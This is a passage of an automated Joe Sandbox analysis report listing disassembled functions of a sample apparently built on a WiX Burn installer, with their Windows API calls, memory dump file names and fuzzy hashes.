                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00C82274,000001C7,00000001,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83967
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1357844191-0
                                                                                                                                                                    • Opcode ID: 056817dad89e60f651453e34203ce425cd535357b0715c76417e19a0fd9052ec
                                                                                                                                                                    • Instruction ID: fded447e7a82e2444db3ca091b3665c7fa7385851a7a87e7a0c191b289cb5475
                                                                                                                                                                    • Opcode Fuzzy Hash: 056817dad89e60f651453e34203ce425cd535357b0715c76417e19a0fd9052ec
                                                                                                                                                                    • Instruction Fuzzy Hash: A3C0127219420DAB8B005FF4DC0EE5E379CF714602B088400F505C2110C738E4148760
                                                                                                                                                                    Function 00CC35C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00CC35F8
                                                                                                                                                                      • Part of subcall function 00CC304F: GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00CC3609,00000000,?,00000000), ref: 00CC3069
                                                                                                                                                                      • Part of subcall function 00CC304F: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00CAC025,?,00C85405,?,00000000,?), ref: 00CC3075
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorHandleInitLastModuleVariant
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 52713655-0
                                                                                                                                                                    • Opcode ID: f535519fa289ce7c791a7e45b4fe4d362d31a938e5011f66b04b9fb82d35c547
                                                                                                                                                                    • Instruction ID: aba28535f89e9385e033039e6a7c4a60cba0aaf77a126437f5c51e71e4cd90f7
                                                                                                                                                                    • Opcode Fuzzy Hash: f535519fa289ce7c791a7e45b4fe4d362d31a938e5011f66b04b9fb82d35c547
                                                                                                                                                                    • Instruction Fuzzy Hash: DF313E76D00269ABCB11DFA8D884BDEB7F8FF08710F01856AFD15AB311D6759E408BA0
                                                                                                                                                                    Function 00CC5870 Relevance: 1.6, APIs: 1, Instructions: 60registryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(80070490,00000000,80070490,00CEAAA0,00000000,80070490,?,?,00C98B19,WiX\Burn,PackageCache,00000000,00CEAAA0,00000000,00000000,80070490), ref: 00CC58CA
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00CC112B
                                                                                                                                                                      • Part of subcall function 00CC10B5: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 00CC1163
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: QueryValue$Close
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1979452859-0
                                                                                                                                                                    • Opcode ID: e056fcc1158e8e3f194a1e1a78cc526c948c1155271b5d806bed1d0bcd8706a4
                                                                                                                                                                    • Instruction ID: 72bee069968a5ee4d894334c52e187b9672269ebc69d6e4abe92b05bcfa6fb93
                                                                                                                                                                    • Opcode Fuzzy Hash: e056fcc1158e8e3f194a1e1a78cc526c948c1155271b5d806bed1d0bcd8706a4
                                                                                                                                                                    • Instruction Fuzzy Hash: 42119E36C4062AEF8B21AE94CC45FAEBB68EB14360B25427DED1167251C7326FD0E7D1
                                                                                                                                                                    Function 00C834B5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,00000104,00000000,?,00C98BD3,0000001C,80070490,00000000,00000000,80070490), ref: 00C834D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FolderPath
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1514166925-0
                                                                                                                                                                    • Opcode ID: fd34c42aa42284c2ea4e1e9b96f715183fae5bcb2c3a7e2bbfcef52b8a99805c
                                                                                                                                                                    • Instruction ID: 1eb7d71c173270509d1794f5bf06fb0d3c811eca3910b47152f3237925ac907d
                                                                                                                                                                    • Opcode Fuzzy Hash: fd34c42aa42284c2ea4e1e9b96f715183fae5bcb2c3a7e2bbfcef52b8a99805c
                                                                                                                                                                    • Instruction Fuzzy Hash: 74E012B22011247BE6023EA59C09DBB7B9C9F45768B048051FE41D6050D766D95097B8
                                                                                                                                                                    Function 00CC9684 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 8b6458a001df49563d236ee5ac8ffed4d8391632a4aeb59a6e5b527daa7e23a5
                                                                                                                                                                    • Instruction ID: cdf599d8216cd109fb41adfc242e86042729b40beb2ff2f7ad85416683341ec0
                                                                                                                                                                    • Opcode Fuzzy Hash: 8b6458a001df49563d236ee5ac8ffed4d8391632a4aeb59a6e5b527daa7e23a5
                                                                                                                                                                    • Instruction Fuzzy Hash: 8DB012D1268241AC3F845147AF4BE37010CC5C0B11330412EF008D20D1E8705C051133
                                                                                                                                                                    Function 00CC9653 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 914267e5a1767c9afd19f45ea59b63f658ba1517401b5252120f3e35a33ff026
                                                                                                                                                                    • Instruction ID: 9346d803b8589db861d2a06b5392de45cc04e0f51f75109e498e481821d773a8
                                                                                                                                                                    • Opcode Fuzzy Hash: 914267e5a1767c9afd19f45ea59b63f658ba1517401b5252120f3e35a33ff026
                                                                                                                                                                    • Instruction Fuzzy Hash: BDB012D1268141FC3F441103ED8AD37010CC5C0B11331812EF004E10D1A8705C041237
                                                                                                                                                                    Function 00CC9674 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CC966B
                                                                                                                                                                      • Part of subcall function 00CC998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CC9A09
                                                                                                                                                                      • Part of subcall function 00CC998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CC9A1A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                    • Opcode ID: 025d2ec6c925f2c9f2ec437936eada40c65bbf94bebc99a582227bd0c7fb27d7
                                                                                                                                                                    • Instruction ID: 80b9604f7bd8d49891afae22fb4c6e6d7ab75b6266cb7aaa3e4e1d9c67193d5b
                                                                                                                                                                    • Opcode Fuzzy Hash: 025d2ec6c925f2c9f2ec437936eada40c65bbf94bebc99a582227bd0c7fb27d7
                                                                                                                                                                    • Instruction Fuzzy Hash: 70B012D1268042AC3B8451079D0BE37050CC1C0B11330C12EF408C20C1E8705C081133
                                                                                                                                                                    Function 00C81361 Relevance: 1.3, APIs: 1, Instructions: 88stringCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00C83BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,00C821CC,000001C7,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83BDB
                                                                                                                                                                      • Part of subcall function 00C83BD3: HeapSize.KERNEL32(00000000,?,00C821CC,000001C7,80004005,8007139F,?,?,00CC0267,8007139F,?,00000000,00000000,8007139F), ref: 00C83BE2
                                                                                                                                                                    • lstrlenW.KERNEL32(000001C7,000001C7,80004005,00000000,?,cabextract.cpp,000001C7), ref: 00C8139C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021038629.0000000000C81000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021024580.0000000000C80000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021068287.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021089145.0000000000CEA000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021103697.0000000000CED000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_c80000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$ProcessSizelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3492610842-0
                                                                                                                                                                    • Opcode ID: 1d42e11a16f51578c9305b465d6b347e1d14cc827a6e12b8ac66fdda19498bd9
                                                                                                                                                                    • Instruction ID: 39cc164cb3cb039c9c894ecccdd3ceea8c870e855558ef495ebcd4448dd1b5db
                                                                                                                                                                    • Opcode Fuzzy Hash: 1d42e11a16f51578c9305b465d6b347e1d14cc827a6e12b8ac66fdda19498bd9
                                                                                                                                                                    • Instruction Fuzzy Hash: AB21EA32D00118AFCB12AF69D840BADB7FDEF84368F194155EC5467260C7359E539B88

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 5BB39384 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 249memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetSaveFileNameW.COMDLG32(?), ref: 5BB39397
                                                                                                                                                                    • memset.MSVCRT ref: 5BB393A9
                                                                                                                                                                    • AllocConvertMultiSZNameToAEx.FONDUE(00000000,00000001), ref: 5BB3943A
                                                                                                                                                                    • free.MSVCRT ref: 5BB395F4
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39607
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39617
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39627
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39637
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB39647
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB3966A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeGlobal$Name$AllocConvertFileMultiSavefreememset
                                                                                                                                                                    • String ID: L
                                                                                                                                                                    • API String ID: 2849690568-2909332022
                                                                                                                                                                    • Opcode ID: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                                    • Instruction ID: 21d808c19f2bf60455c18e43e1fa0dcd5e9bd532f6718678bc66986b2e27de0b
                                                                                                                                                                    • Opcode Fuzzy Hash: 6f89c6a9fae0c5476ff7450a0bb8e4784becf555294f8ee5839a91709fc408a9
                                                                                                                                                                    • Instruction Fuzzy Hash: 81B1C7B5A01208EFDB04DF94C484BEDBBB2FB48311F108159E94A9B295D7B5EAC1CF94
                                                                                                                                                                    Function 5BB467F0 Relevance: 16.6, APIs: 11, Instructions: 109memorystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB46800
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000), ref: 5BB46829
                                                                                                                                                                    • lstrlenW.KERNEL32(00000000), ref: 5BB4683C
                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 5BB46865
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 5BB46884
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,?,00000000,00000000), ref: 5BB468A3
                                                                                                                                                                    • FindWindowExA.USER32(?,?,?,?), ref: 5BB468BC
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 5BB468D7
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB468E4
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 5BB468FC
                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 5BB46909
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharGlobalMultiWide$AllocFreelstrlen$FindWindow
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1626120915-0
                                                                                                                                                                    • Opcode ID: 480694980ddb106a3a8d57d6accc4018b86072180fcf76bd1330face988a9efc
                                                                                                                                                                    • Instruction ID: 38e61f1c64c01b46d597e86f1ecfd16b7634c50691c6ecede228006a5ea1d5ac
                                                                                                                                                                    • Opcode Fuzzy Hash: 480694980ddb106a3a8d57d6accc4018b86072180fcf76bd1330face988a9efc
                                                                                                                                                                    • Instruction Fuzzy Hash: FF41D6B5A00609AFDB04DF98C849FAEB7B6FB48710F104219FA25B72C4D7B5A940DB64
                                                                                                                                                                    Function 5BB383B2 Relevance: 15.1, APIs: 10, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • StartDocW.GDI32(?,?), ref: 5BB383C9
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB383DD
                                                                                                                                                                    • memset.MSVCRT ref: 5BB383EB
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB38413
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38487
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB38497
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB384A7
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeGlobal$ByteCharErrorFromLastMultiStartWidememset
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3584426206-0
                                                                                                                                                                    • Opcode ID: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                                    • Instruction ID: 9d7f381b9fc1066624e1d70141abf82ecf9c865936cfe4d8509ca253bbf3e802
                                                                                                                                                                    • Opcode Fuzzy Hash: 6abe2c60daa5fcda0ba1dd3f3a64e22e9c92c67b6be7a1158dffddfdeda54af3
                                                                                                                                                                    • Instruction Fuzzy Hash: B53106B5D00208EFDB40DFA0D888BAEB7B5FB44301F00C659E9156B290D7B5DA84DF96
                                                                                                                                                                    Function 5BB42384 Relevance: 13.6, APIs: 9, Instructions: 85registrystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetLastError.KERNEL32(00000008), ref: 5BB423A7
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423B7
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(00000000), ref: 5BB423E3
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 5BB42400
                                                                                                                                                                    • RegSetValueA.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 5BB42455
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB42468
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB42478
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$ErrorLastValuelstrlen
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2318199773-0
                                                                                                                                                                    • Opcode ID: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                                    • Instruction ID: 62f50d4aa6feed3817b429dc07edf9552c1dc7ce7379a4b05b1e5e0691334358
                                                                                                                                                                    • Opcode Fuzzy Hash: ad980b04aed37ae1c4385e259f75cb8f6ea759551a7cb4b7db3e2f4f4949b57c
                                                                                                                                                                    • Instruction Fuzzy Hash: E43117B1D10219EFCF00DFA4C848BAEBBB2FB08301F008959EA15A3244D3B59694FF95
                                                                                                                                                                    Function 5BB31BB6 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • memset.MSVCRT ref: 5BB31BCB
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31C8B
                                                                                                                                                                      • Part of subcall function 5BB35237: newMultiByteFromWideCharEx.FONDUE(5BB31792,00000000,00000000,?,5BB31792,?), ref: 5BB35242
                                                                                                                                                                    • newMultiByteFromWideChar.FONDUE(?), ref: 5BB31CD6
                                                                                                                                                                    • PrintDlgA.COMDLG32(00000042), ref: 5BB31D0D
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB31DA2
                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 5BB31DD5
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000001.00000002.2021650252.000000005BB31000.00000020.00000001.01000000.00000006.sdmp, Offset: 5BB30000, based on PE: true
                                                                                                                                                                    • Associated: 00000001.00000002.2021630496.000000005BB30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021677948.000000005BB4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021699447.000000005BB50000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021718673.000000005BB58000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000001.00000002.2021745146.000000005BB5A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_1_2_5bb30000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharFromMultiWide$FreeGlobal$Printmemset
                                                                                                                                                                    • String ID: B
                                                                                                                                                                    • API String ID: 4070397486-1255198513
                                                                                                                                                                    • Opcode ID: 0bf65f0da40171ee638707cf269d2bb20f1598853ffc4a69b58c8d846a67d364
